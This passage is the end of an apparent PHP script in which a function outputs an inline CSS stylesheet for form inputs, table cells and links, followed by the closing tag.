font-size: 11px;
}
.INPUT
{
font-family: verdana;
FONT-SIZE: 11px;
COLOR: #ffffff;
BACKGROUND-COLOR: #666666;
height: 18px;
border: 1px solid #ffffff;
padding-left: 1px;
padding-right: 1px;
padding-bottom: 1px;
padding-top: 1px
}
.td
{
font-family: Tahoma;
font-size: 11px;
color: #ffffff;
border: 1px solid #ffffff;
}
.ccfont
{
color: #cccccc
}
.top
{
BACKGROUND-COLOR: #222222
}
.firstalt
{
BACKGROUND-COLOR: #000000
}
.secondalt
{
BACKGROUND-COLOR: #000000
}
a:link, a:visited, a:active {color: #00FF00; text-decoration: underline;}
a:hover {color: #FFFFFF; text-decoration: none;}
</style>';
}
################ End Functions ###############
?>